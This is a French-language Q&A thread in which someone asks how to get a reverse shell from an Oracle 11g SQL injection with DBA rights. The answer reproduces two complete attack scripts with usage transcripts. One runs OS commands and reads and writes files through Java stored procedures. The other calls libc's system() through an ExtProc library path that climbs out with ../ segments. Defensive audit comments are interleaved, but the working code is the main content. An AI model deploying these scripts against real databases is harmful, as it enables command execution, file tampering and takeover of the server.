
Oracle SQL Injection Reverse Shell

Je teste une injection SQL sur un site Web écrit en ASP. Je parviens à récupérer la liste de toutes les bases de données et de toutes les tables. L'utilisateur courant a les privilèges DBA. Comment puis-je obtenir un reverse shell à partir de cette injection SQL ? La version d'Oracle est « Base de données Oracle 11G Enterprise Edition version 11.1.0.7.0 ».

user1968957

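Voici deux façons d'exécuter du code depuis le SGBD Oracle. Les deux scripts ci-dessous sont prévus pour être lancés dans une session SQL*Plus (voir leurs exemples d'utilisation) et créent des objets dans la base.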

La première passe par du code Java : http://www.0xdeadbeef.info/exploits/raptor_oraexec.sql

-- Usage example:
-- $ sqlplus "/ as sysdba"
-- [...]
-- SQL> @raptor_oraexec.sql
-- [...]
-- SQL> exec javawritefile('/tmp/mytest', '/bin/ls -l > /tmp/aaa');
-- SQL> exec javawritefile('/tmp/mytest', '/bin/ls -l / > /tmp/bbb');
-- SQL> exec dbms_Java.set_output(2000);
-- SQL> set serveroutput on;
-- SQL> exec javareadfile('/tmp/mytest');
-- /bin/ls -l > /tmp/aaa
-- /bin/ls -l / >/tmp/bbb
-- SQL> exec javacmd('/bin/sh /tmp/mytest');
-- SQL> !sh
-- $ ls -rtl /tmp/
-- [...]
-- -rw-r--r--   1 Oracle   system        45 Nov 22 12:20 mytest
-- -rw-r--r--   1 Oracle   system      1645 Nov 22 12:20 aaa
-- -rw-r--r--   1 Oracle   system      8267 Nov 22 12:20 bbb
-- [...]
--

-- Defines the Java source object "oraexec", stored and resolved (compiled)
-- inside the database. Its three static methods are what the call specs
-- javacmd / javareadfile / javawritefile later in this script bind to: one
-- starts an OS process, one prints a file, one appends a line to a file.
--
-- Review notes (defensive):
--   * Whether these methods succeed depends on the Java permissions of the
--     schema that owns the class: Oracle's JVM gates file and process access
--     with java.io.FilePermission grants (made through
--     DBMS_JAVA.GRANT_PERMISSION or roles such as JAVASYSPRIV).
--     DBA_JAVA_POLICY shows what has been granted.
--   * Unexpected JAVA SOURCE / JAVA CLASS rows in DBA_OBJECTS are the
--     artifact this statement leaves behind.
--   * None of the methods validates its arguments; every path and command
--     string is used exactly as the SQL caller supplied it.
create or replace and resolve Java source named "oraexec" as
import Java.lang.*;
import Java.io.*;
public class oraexec
{
    /*
     * Command execution module
     *
     * Hands the string to Runtime.exec(). The returned Process object is
     * discarded, so the command's output and exit status are never read
     * here and nothing about the run comes back to the SQL session.
     */
    public static void execCommand(String command) throws IOException
    {
        Runtime.getRuntime().exec(command);
    }

    /*
     * File reading module
     *
     * Prints the file line by line to System.out. The usage notes in this
     * script enable dbms_Java.set_output and serveroutput before calling it,
     * which is how that output becomes visible in the session.
     * The reader is closed only on the normal path; an IOException thrown
     * while reading skips fr.close().
     */
    public static void readFile(String filename) throws IOException
    {
        FileReader f = new FileReader(filename);
        BufferedReader fr = new BufferedReader(f);
        String text = fr.readLine();
        while (text != null) {
            System.out.println(text);
            text = fr.readLine();
        }
        fr.close();
    }

    /*
     * File writing module
     *
     * Opens the file in append mode (second FileWriter argument is true),
     * so an existing file is extended rather than replaced, then writes the
     * line followed by a newline.
     */
    public static void writeFile(String filename, String line) throws IOException
    {
        FileWriter f = new FileWriter(filename, true); /* append */
        BufferedWriter fw = new BufferedWriter(f);
        fw.write(line);
        fw.write("\n");
        fw.close();
    }
}
/

-- usage: exec javacmd('command');
-- Call spec: publishes oraexec.execCommand(String) as the PL/SQL procedure
-- javacmd, so p_command is handed to the Java method as-is. Nothing at this
-- layer validates or restricts the string.
-- NOTE(review): when auditing a database, check who holds EXECUTE on a
-- procedure like this one and whether the owning schema has the Java
-- permissions the underlying method needs.
create or replace procedure javacmd(p_command varchar2) as
language Java           
name 'oraexec.execCommand(Java.lang.String)';
/

-- usage: exec dbms_Java.set_output(2000);
--        set serveroutput on;
--        exec javareadfile('/path/to/file');
-- Call spec: publishes oraexec.readFile(String) as the PL/SQL procedure
-- javareadfile. The file is read on the database host, not on the client,
-- and its contents are only visible once Java output has been redirected to
-- the session as in the usage lines above.
-- p_filename is passed through without any path restriction at this layer.
create or replace procedure javareadfile(p_filename in varchar2) as
language Java
name 'oraexec.readFile(Java.lang.String)';
/

-- usage: exec javawritefile('/path/to/file', 'line to append');
-- Call spec: publishes oraexec.writeFile(String, String) as the PL/SQL
-- procedure javawritefile. Each call appends p_line plus a newline to
-- p_filename on the database host; neither argument is checked here.
-- NOTE(review): files created this way are presumably owned by the OS
-- account the database runs as (the usage listing at the top of the script
-- shows owner "Oracle") - useful when looking for leftover artifacts.
create or replace procedure javawritefile(p_filename in varchar2, p_line in varchar2) as
language Java
name 'oraexec.writeFile(Java.lang.String, Java.lang.String)';
/

La seconde utilise ExtProc: http://www.0xdeadbeef.info/exploits/raptor_oraextproc.sql

-- Usage example:
-- $ echo $Oracle_HOME
-- /opt/Oracle/
-- $ sqlplus "/ as sysdba"
-- [...]
-- Connected to:
-- Oracle9i Enterprise Edition Release 9.2.0.1.0 - 64bit Production
-- With the Partitioning, OLAP and Oracle Data Mining options
-- JServer Release 9.2.0.1.0 - Production
-- SQL> @raptor_oraextproc.sql
-- [...]
-- exec oracmd32.exec('touch /tmp/32');
-- [...]
-- ERROR at line 1:
-- ORA-06520: PL/SQL: Error loading external library
-- ORA-06522: ld.so.1: extprocPLSExtProc: fatal:
-- /opt/Oracle/bin/../../../../../../../lib/32/libc.so.1: wrong ELF class:
-- ELFCLASS32
-- [...]
-- SQL> exec oracmd64.exec('touch /tmp/64');
-- SQL> !ls -l /tmp/64
-- -rw-r--r--   1 Oracle   orainst        0 Dec 19 13:49 /tmp/64
--

-- library for 32-bit Oracle releases
-- Registers the library object exec_Shell32. Its file specification starts
-- under $Oracle_HOME/bin and climbs with ../ segments until it reaches the
-- system's 32-bit libc.so.1.
-- NOTE(review): the $Oracle_HOME/bin prefix is presumably there because the
-- external-procedure agent limited where libraries may be loaded from -
-- confirm against the release in question.
-- Defensive notes: creating a library object requires CREATE LIBRARY (or
-- CREATE ANY LIBRARY); DBA_LIBRARIES lists each library with its file spec,
-- and a spec that contains ../ or names a system libc deserves a close look.
-- Where external procedures are needed, EXTPROC_DLLS can restrict which
-- libraries the agent will load; where they are not, the extproc listener
-- entry can be removed.
create or replace library exec_Shell32 as
'$Oracle_HOME/bin/../../../../../../../lib/32/libc.so.1';
/

-- library for 64-bit Oracle releases
-- Registers the library object exec_Shell64: same construction as the
-- 32-bit variant, but the ../ chain ends at the 64-bit libc.so.1. The usage
-- transcript at the top of this script shows the 32-bit library failing
-- with ORA-06520 / "wrong ELF class" on a 64-bit installation, which is why
-- both variants are defined.
-- Defensive notes: library objects appear in DBA_LIBRARIES with their file
-- spec; CREATE LIBRARY / CREATE ANY LIBRARY are the privileges to review.
create or replace library exec_Shell64 as
'$Oracle_HOME/bin/../../../../../../../lib/64/libc.so.1';
/

-- package for 32-bit Oracle releases
-- usage: exec oracmd32.exec('command');
-- Package specification: exposes a single procedure, exec, that takes the
-- command string.
create or replace package oracmd32 as
    procedure exec(cmdstring in char);
end oracmd32;
/
-- Package body: exec has no PL/SQL implementation. It is declared as an
-- external C routine, bound by name to the symbol "system" in the library
-- object exec_Shell32, so the call leaves the database and runs in the
-- external-procedure agent.
-- cmdstring is forwarded unchanged; there is no validation at this layer.
-- NOTE(review): who can reach this depends on EXECUTE grants on the package
-- and on whether the external-procedure agent is configured at all - both
-- are worth checking during a hardening review.
create or replace package body oracmd32 as
    procedure exec(cmdstring in char)
    is external
    name "system"
    library exec_Shell32
    language c;
end oracmd32;
/

-- package for 64-bit Oracle releases
-- usage: exec oracmd64.exec('command');
-- Package specification: exposes a single procedure, exec, that takes the
-- command string.
create or replace package oracmd64 as
    procedure exec(cmdstring in char);
end oracmd64;
/
-- Package body: same external binding as oracmd32, but against the library
-- object exec_Shell64. In the usage transcript at the top of the script this
-- is the variant that succeeds on the 64-bit installation, and the file it
-- creates is owned by the "Oracle" OS account.
-- cmdstring is forwarded unchanged; there is no validation at this layer.
-- NOTE(review): packages whose body consists only of "is external"
-- declarations against a system library are a strong review signal.
create or replace package body oracmd64 as
    procedure exec(cmdstring in char)
    is external
    name "system"
    library exec_Shell64
    language c;
end oracmd64;
/
Cristian Dobre